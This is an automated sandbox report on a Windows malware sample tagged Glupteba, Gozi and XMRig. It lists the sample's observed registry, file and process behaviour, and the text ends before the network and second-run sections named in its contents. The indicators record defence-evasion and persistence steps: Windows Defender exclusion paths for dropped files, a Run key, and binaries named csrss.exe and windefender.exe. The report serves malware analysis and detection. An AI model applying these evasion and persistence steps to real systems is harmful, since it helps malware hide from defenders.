Malware Analysis Report

2025-01-22 18:53

Sample ID 240307-fh2x6afe4x
Target 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f
SHA256 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f
Tags
glupteba discovery dropper evasion loader persistence rootkit trojan upx gozi xmrig banker isfb miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f

Threat Level: Known bad

The file 57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f was found to be: Known bad.

Malicious Activity Summary

glupteba discovery dropper evasion loader persistence rootkit trojan upx gozi xmrig banker isfb miner

Glupteba payload

xmrig

Gozi

Glupteba

XMRig Miner payload

Windows security bypass

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

UPX packed file

Windows security modification

Executes dropped EXE

Loads dropped DLL

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Checks installed software on the system

Adds Run key to start application

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

GoLang User-Agent

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-07 04:53

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-07 04:53

Reported

2024-03-07 04:58

Platform

win10-20240221-en

Max time kernel

300s

Max time network

304s

Command Line

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Windows\windefender.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
